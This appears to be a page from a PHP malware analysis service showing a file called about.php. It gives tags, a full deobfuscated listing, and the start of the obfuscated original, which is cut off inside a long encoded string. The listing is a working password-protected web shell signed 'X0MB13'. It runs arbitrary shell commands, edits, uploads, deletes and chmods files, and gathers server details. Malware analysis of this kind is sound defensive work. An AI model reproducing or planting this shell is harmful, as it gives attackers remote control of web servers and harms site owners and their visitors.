PHP Malware Analysis

Back to list

Filename: about.php

Tags

URLs
Emails
  • X0MB13@REBORN.COM
Title
  • ' . getenv('HTTP_HOST') . ' => X0MB13
Execution
  • system
  • eval
  • exec
  • passthru
  • shell_exec
Input
  • _GET
  • _POST
  • _FILES
Environment
  • error_reporting
  • php_uname
  • getcwd
  • phpinfo
Files
  • move_uploaded_file

Deobfuscated code

<br />
<b>Warning</b>:  ob_start(): output handler 'ob_gzhandler' conflicts with 'zlib output compression' in <b>/home/aravalcl/public_html/wp/wp-content/plugins/seo/alfa-index.php(3) : eval()'d code(1) : eval()'d code</b> on line <b>3245</b><br />
<?php 
/**
 **/
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$sym = "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";
eval /* PHPDeobfuscator eval output */ {
    error_reporting(0);
    $xyn = 'tunafeesh';
    if (isset($_POST['pass'])) {
        if ($_POST['pass'] == $password) {
            setcookie($xyn, $_POST['pass'], time() + 3600);
        }
        let_him_in();
    }
    if (!empty($password) && !isset($_COOKIE[$xyn]) or $_COOKIE[$xyn] != $password) {
        initiate();
        die;
    }
    $me = basename("/var/www/html/input.php");
    $server_soft = $_SERVER["SERVER_SOFTWARE"];
    $uname = php_uname();
    $cur_user = get_current_user() . ' uid:' . getmyuid() . ' gid:' . getmygid();
    $safe_mode = ini_get('safe_mode');
    $safe_mode = $safe_mode ? '<font color:crimson>ON</font>' : '<font color=#ccff00>OFF</font>';
    $cwd = getcwd();
    $bckC = '#333333';
    $txtC = '#999999';
    $start = '<html><head><title>' . getenv('HTTP_HOST') . ' => X0MB13</title><style>body {background:' . $bckC . ';color:' . $txtC . ';font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:' . $txtC . ';text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:' . $txtC . ';color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:' . $bckC . ';box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:' . $bckC . ';border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:' . $bckC . ';border-radius:10px;border:1px solid ' . $txtC . ';color:' . $txtC . ';text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:' . $txtC . ';box-shadow:0px 0px 1px ' . $txtC . ';border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid ' . $txtC . ';padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:' . $bckC . ';color:' . $txtC . ';box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type="text/javascript">function get_inf() {if(document.getElementById(\'moreI\').style.display=="block"){document.getElementById(\'moreI\').style.display="none"}else {document.getElementById(\'moreI\').style.display="block";}} function xyn(id1,id2) {document.getElementById(id1).style.display="block";document.getElementById(id2).style.display="none";}</script></head><body><h1 id="n"><a href="?x=x">X0MB13</a></h1>';
    $menu = '<center><p id="menu"><span id="menuB"><<a href="' . $me . '">Home</a>> <<a href="?x=cmd&d="' . realpath('.') . '">Command</a>> <<a href="?x=php&d="' . realpath('.') . '">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>';
    $end = '</body></html>';
    $inf = '<center><p id="inf">||| <b><i><u>Software:</u></i></b> ' . $server_soft . '  |||  <b><i><u>Uname:</u></i></b> ' . $uname . ' |||</br>||| <b><i><u>User:</u></i></b> ' . $cur_user . ' ||| <b><i><u>Safe Mode:</u></i></b> ' . $safe_mode . ' ||| <b><i><u>Directory: </i></b></u>' . $cwd . ' |||</p></center><hr>';
    print $start;
    print $menu;
    print $inf;
    $moreI = array('PHP Version' => phpversion(), 'Zend Version' => zend_version(), 'Magic Quotes' => magic_quotes(), 'Curl' => curl(), 'Register Globals' => reg_globals(), 'OpenBase Dir' => openbase_dir(), 'MySQL' => myql(), 'Gzip' => gzip(), 'MsSQL' => mssql(), 'PostgreSQL' => postgresql(), 'Oracle' => oracle(), 'Total Space' => h_size(disk_total_space('/')), 'Used Space' => h_size(disk_free_space('/')), 'Your IP' => $_SERVER['REMOTE_ADDR'], 'Server IP' => $_SERVER['SERVER_ADDR']);
    print "<table id=\"moreI\">";
    foreach ($moreI as $n => $v) {
        print '<td>' . $n . '</td><td> :> </td><td> ' . $v . '</td><tr>';
    }
    print "<td colspan=3 align=\"center\"><a href=\"?x=phpinf\" target=\"_blank\">PHPInfo</a></td></table>";
    if (isset($_GET['d'])) {
        chdir($_GET['d']);
    }
    if (isset($_REQUEST['x'])) {
        print '<p id="bck"><a href="?d=' . realpath('.') . '">BACK</a></p>';
        switch ($_REQUEST['x']) {
            case 'c':
                if (isset($_POST['edit_form'])) {
                    $f = $_GET['f'];
                    $e = fopen($f, 'w') or print "<p id=\"nn\">Error Opening File</p>";
                    fwrite($e, $_POST['edit_form']) or print "<p id=\"nn\">Couldn't Save File</p>";
                    fclose($e);
                }
                print '<center><p>Editing ' . $_GET['f'] . ' (' . perms($_GET['d'] . $_GET['f']) . ') .</p></br></br><form action="?x=c&d=' . realpath('.') . '&f=' . $_GET['f'] . '" method="POST"><textarea cols=90 rows=15 name="edit_form" id="edit">';
                if (file_exists($_GET['f'])) {
                    $c = file($_GET['f']);
                    foreach ($c as $l) {
                        print htmlspecialchars($l);
                    }
                }
                print "</textarea></br></br><input type=\"submit\" value=\"Save\" id=\"sv\"></form></center>";
                break;
            case 'cmd':
                print '</br></br><center><h3>Execute Command</h3><form action="?x=cmd&d=' . realpath('.') . '" method="POST"><input type="text" value="" name="cmd" id="lt">  <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';
                if (isset($_POST['cmd'])) {
                    $cmd = $_POST['cmd'];
                    execute(exec_meth(), $cmd);
                }
                print "</textarea></center>";
                break;
            case 'php':
                print '</br></br><center><h3>PHP Code</h3><form action=?x=php&d="' . realpath('.') . '" method="POST"><input type="text" value="" name="pcode" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';
                print "</textarea></center>";
                break;
            case 'phpinf':
                phpinfo();
                break;
            case 'q':
                setcookie($xyn, '', time() - 3600);
                let_him_in();
                break;
            case 'x':
                print "</br></br></br><center><h1 id=\"nm\">H1 7H15 15 X0MB13</h1><h3>Mail: <a href=\"mailto:X0MB13@REBORN>COM\">X0MB13@REBORN.COM</a></h3><h3>Twitter: <a href=\"http://www.twitter.com/X0MB13_\" target=\"_blank\">X0MB13</a></h3><h3>Facebook: <a href=\"http://www.fb.com/xombie.xombie.7\" target=\"_blank\">X0MB13</a></h3></center>";
                break;
        }
    } else {
        if (isset($_GET['d'])) {
            chdir($_GET['d']);
        }
        if (isset($_GET['ndir'])) {
            $d = $_GET['d'];
            $n = $_GET['ndir'];
            mkdir($d . DIRECTORY_SEPARATOR . $n);
        }
        if (isset($_POST['new'])) {
            $n = $_POST['new'];
            $o = $_POST['old'];
            $d = $_POST['d'];
            rename($d . DIRECTORY_SEPARATOR . $o, $d . DIRECTORY_SEPARATOR . $n);
        }
        if (isset($_GET['deld'])) {
            $d = $_GET['deld'];
            rmdir($d);
        }
        if (isset($_GET['delf'])) {
            $d = $_GET['delf'];
            unlink($d);
        }
        if (isset($_GET['ch'])) {
            $ch = $_GET['ch'];
            $d = $_GET['df'];
            chmod($d, $ch);
        }
        if (isset($_FILES['upfile']['name'])) {
            $d = realpath('.') . DIRECTORY_SEPARATOR . basename($_FILES['upfile']['name']);
            move_uploaded_file($_FILES['upfile']['tmp_name'], $d);
        }
        print '<p align="center" id="cp">' . curpath('') . '</p>';
        print '<table width=90% align="center" id="lt"cellpadding="0"><td align="center"><form action="?d=' . realpath('.') . '" method="GET">Create Dir: <input type="hidden" name="d" value="' . realpath('.') . '" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d="' . realpath('.') . '" method="GET">Create File: <input type="hidden" value="' . realpath('.') . '" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&d=' . realpath('.') . '" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=' . realpath('.') . '" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></table>';
        print "</br>";
        $filex = array();
        $dirx = array();
        print "<table width=\"75%\" align=\"center\" id=\"ft\" ><td id=\"fh\"><b>Name</b></td><td id=\"fh\" align=\"center\"><b>Permissions</b></td><td id=\"fh\" align=\"center\"><b>Owner</b></td><td id=\"fh\" align=\"center\"><b>Options</b></td><tr id=\"fn\">";
        if ($handle = opendir('.')) {
            while (false !== ($file = readdir($handle))) {
                if (is_dir($file)) {
                    $dirx[] .= $file;
                } else {
                    $filex[] .= $file;
                }
            }
            asort($filex);
            asort($dirx);
            $i = 0;
            foreach ($dirx as $file) {
                if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
                    $own = posix_getpwuid(fileowner($file));
                    $grp = posix_getgrgid(filegroup($file));
                } else {
                    $own['name'] = '???';
                    $grp['name'] = '???';
                }
                print '<td id="fc"><span id="n' . $file . '"><a href="?d=' . realpath($file) . '">' . $file . '</a></span><span id="r' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="POST"><input type="hidden" value="' . realpath('.') . '" name="d"> <input type="text" value="' . $file . '" id="lt" name="new"><input type="hidden" value="' . $file . '" name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'n' . $file . '\',\'r' . $file . '\');"></form></span><span id="d' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET">Are you Sure?<input type="hidden" value="' . realpath($file) . '" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n' . $file . '\',\'d' . $file . '\')"></form></span></td><td id="fc" align="center"><span id="h' . $file . '"><a href="javascript:xyn(\'c' . $file . '\',\'h' . $file . '\');"><font color="' . get_color($file) . '">' . perms($file) . '</font></a></span><span id="c' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET"><input type="hidden" value="' . realpath($file) . '" name="df"><input type="text" value="' . perms($file) . '" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h' . $file . '\',\'c' . $file . '\');"></form></span></td><td id="fc" align="center">' . $own['name'] . ' : ' . $grp['name'] . '</td>';
                if ($i == 0 or $i == 1) {
                    print "<td id=\"fc\"></td><tr id=\"fn\">";
                } else {
                    print '<td id="fc" align="center"><a href="javascript:xyn(\'r' . $file . '\',\'n' . $file . '\')">[R]</a> <a href="javascript:xyn(\'d' . $file . '\',\'n' . $file . '\')">[D]</a></td><tr id="fn">';
                }
                $i++;
            }
            foreach ($filex as $file) {
                if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
                    $own = posix_getpwuid(fileowner($file));
                    $grp = posix_getgrgid(filegroup($file));
                } else {
                    $own['name'] = '???';
                    $grp['name'] = '???';
                }
                print '<td id="fc"><span id="n' . $file . '"><a href="?x=c&d=' . realpath('.') . '&f=' . $file . '">' . $file . '</a></span><span id="r' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="POST"><input type="hidden" value="' . realpath('.') . '" name="d"> <input type="text" id="lt" value="' . $file . '" name="new"><input type="hidden" value="' . $file . '" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onClick="xyn(\'n' . $file . '\',\'r' . $file . '\');"></form></span><span id="d' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET">Are you Sure?<input type="hidden" value="' . realpath($file) . '" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n' . $file . '\',\'d' . $file . '\')"></form></span></td><td id="fc" align="center"><span id="h' . $file . '"><a href="javascript:xyn(\'c' . $file . '\',\'h' . $file . '\');"><font color="' . get_color($file) . '">' . perms($file) . '</font></a></span><span id="c' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET"><input type="hidden" value="' . realpath($file) . '" name="df"><input type="text" value="' . perms($file) . '" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h' . $file . '\',\'c' . $file . '\');"></form></span></td><td id="fc" align="center">' . $own['name'] . ' : ' . $grp['name'] . '</td><td id="fc" align="center"><a href="javascript:xyn(\'r' . $file . '\',\'n' . $file . '\')">[R]</a> <a href="javascript:xyn(\'d' . $file . '\',\'n' . $file . '\');">[D]</a></td><tr id="fn">';
            }
        }
        print "</table></br></br></br>";
    }
    function openbase_dir()
    {
        $x = ini_get('open_basedir');
        if (!$x) {
            $o = '<font color=#ccff00>OFF</font>';
        } else {
            $o = '<font color=crimson>ON</font>';
        }
        return $o;
    }
    function magic_quotes()
    {
        $x = get_magic_quotes_gpc();
        if (empty($x)) {
            $m = '<font color=#ccff00>OFF</font>';
        } else {
            $m = '<font color=crimson>ON</font>';
        }
        return $m;
    }
    function curl()
    {
        if (extension_loaded('curl')) {
            $c = '<font color=crimson>ON</font>';
        } else {
            $c = '<font color=#ccff00>OFF</font>';
        }
        return $c;
    }
    function reg_globals()
    {
        if (ini_get('reqister_globals')) {
            $r = '<font color=crimson>ON</font>';
        } else {
            $r = '<font color=#ccff00>OFF</font>';
        }
        return $r;
    }
    function oracle()
    {
        if (function_exists('ocilogon')) {
            $o = '<font color=crimson>ON</font>';
        } else {
            $o = '<font color=#ccff00>OFF</font>';
        }
        return $o;
    }
    function postgresql()
    {
        if (function_exists('pg_connect')) {
            $p = '<font color=crimson>ON</font>';
        } else {
            $p = '<font color=#ccff00>OFF</font>';
        }
        return $p;
    }
    function myql()
    {
        if (function_exists('mysql_connect')) {
            $m = '<font color=crimson>ON</font>';
        } else {
            $m = '<font color=#ccff00>OFF</font>';
        }
        return $m;
    }
    function mssql()
    {
        if (function_exists('mssql_connect')) {
            $m = '<font color=crimson>ON</font>';
        } else {
            $m = '<font color=#ccff00>OFF</font>';
        }
        return $m;
    }
    function gzip()
    {
        if (function_exists('gzencode')) {
            $m = '<font color=crimson>ON</font>';
        } else {
            $m = '<font color=#ccff00>OFF</font>';
        }
        return $m;
    }
    function h_size($s)
    {
        if ($s >= 1073741824) {
            $s = round($s / 1073741824 * 100) / 100 . 'GB';
        } elseif ($s >= 1048576) {
            $s = round($s / 1048576 * 100) / 100 . 'MB';
        } elseif ($s >= 1024) {
            $s = round($s / 1024 * 100) / 100 . 'KB';
        } else {
            $s .= 'B';
        }
        return $s;
    }
    function curpath($d)
    {
        if ($d == '') {
            $d = getcwd();
        }
        $p = '';
        $n = '';
        $dx = explode(DIRECTORY_SEPARATOR, $d);
        for ($i = 0; $i < count($dx); $i++) {
            $g = $dx[$i];
            $p .= $dx[$i] . DIRECTORY_SEPARATOR;
            $n .= '<a href="?d=' . $p . '">' . $g . '</a>' . DIRECTORY_SEPARATOR;
        }
        return $n;
    }
    function get_color($f)
    {
        if (is_writable($f)) {
            $c = '#ccff00';
        }
        if (!is_writable($f) && is_readable($f)) {
            $c = '' . $txtC . '';
        }
        if (!is_writable($f) && !is_readable($f)) {
            $c = 'crimson';
        }
        return $c;
    }
    function perms($f)
    {
        if (file_exists($f)) {
            return substr(sprintf('%o', fileperms($f)), -4);
        } else {
            return '???';
        }
    }
    function exec_meth()
    {
        if (function_exists('passthru')) {
            $m = 'passthru';
        }
        if (function_exists('exec')) {
            $m = 'exec';
        }
        if (function_exists('shell_exec')) {
            $m = 'shell_exec';
        }
        if (function_exists('system')) {
            $m = 'system';
        }
        if (!isset($m)) {
            $m = 'Disabled';
        }
        return $m;
    }
    function execute($m, $c)
    {
        if ($m == 'passthru') {
            passthru($c);
        } elseif ($m == 'system') {
            system($c);
        } elseif ($m == 'shell_exec') {
            print shell_exec($c);
        } elseif ($m == 'exec') {
            exec($c, $r);
            foreach ($r as $o) {
                print $o . '</br>';
            }
        } else {
            print "dafuq?";
        }
    }
    function initiate()
    {
        print '<table border=0 width=100% height=100% align=center style="background:#333333;color:silver;"><td valign="middle"><center><form action="' . basename("/var/www/html/input.php") . '" method="POST">Password <input type="password" maxlength="10" name="pass" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;text-align:center;"> <input type="submit" value=">>" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;"></form></center></td></table>';
    }
    function let_him_in()
    {
        header("Location: " . basename("/var/www/html/input.php"));
    }
    print $end;
};


Original code

<br />
<b>Warning</b>:  ob_start(): output handler 'ob_gzhandler' conflicts with 'zlib output compression' in <b>/home/aravalcl/public_html/wp/wp-content/plugins/seo/alfa-index.php(3) : eval()'d code(1) : eval()'d code</b> on line <b>3245</b><br />
<?php

/**

**/ 


@ini_set('output_buffering',0); 
@ini_set('display_errors', 0);

$sym = "7Rv9aptT8uf2vf4PG0wN0lLRVJw2SiHI1a7t3l0bO8rHeJ3k8UuygCUVwSI4g6v//XNpAQFPtpy73nSTOHNqdHN0dHN0c4eFM1OZwbhSmRObq86wq37xbHu+MDXFZFov5NyOFOiKw0F529zptI3jo9Ozaorl2bbyodslNzBH7dS0Nj7MKAtgGJB8V69w3k6yPUWF7REnQWyn++jw6yHMvSYJaowoQY3Y7EBGWfyAp5az6JSIPnxVHuTsXBwd/fRp+g6Jf+gSylWt706JG+TWjJ3YZmBXlQQxl5O0Rq4tPZubHvBvGK/e/jw1jK7atjm74sywduh1euNnbfLn6cm7lvx6nB69OvvLi5N264PaaRFGsyLLEEJAte27zGOBgLaCFU6DZNMRHZ1hXyFhHIyVPgylC2sUXata1wq7YG2Qv5HSgHjAtQEjHaXoRSrjnc1m92xUmYTUZ4hCE8rGPotGm5r60beTAWnrV2pcgdAOfD8Mh1D96NWrAgT4nwXIOvxPSZb+9YWmHByKP4raaeYOtr8Rf9BA2rbjMVRGJpGTJvok4l6gQpzYVrguFsXNq47y5uzs2GsD6kpjwZpB/jq8PB8dQQYSY287C/i1pMGC3Cw9/23FqHiiR8T8fVKVWII2zg965PaxHf/Cx99LjnmFXhoni/EZ41jXj7hQLkJ7IH47vuI92zN6AiqIUGgdjQ7MG4vaYA7UHIfxnAeqUK3xdXXN1YSHjnxl+BxziLyAzsbQJvjzFfwsE+Av4+fg2Tfe4eiZpJne3AvFIzf1Ugn8gPuUbII3k5q8srYLmsY+OcXFXNqNi/PGEQXLzXZiGHFowXNmVzjJ4do6AGQ3yeYJV4TFq8iRj+uDlJsuqYMuqePQFNeuzuLAiUCSwy9YuhodgrIk7vkOUi/pvC5PR1QmwyV5c84eMy+IXXs8AuGqlhcE4MDGKOgnucQlk463WfhOVxl/e0Y1mB1GSogjidu5KVqtNlji6VNh4jGIeivxFkWzIGHfIiXOUyMUj+Q6ZCojUByJWstoYKQnH+yrnTJ5SwhpjVTAu1qTOCBoC6h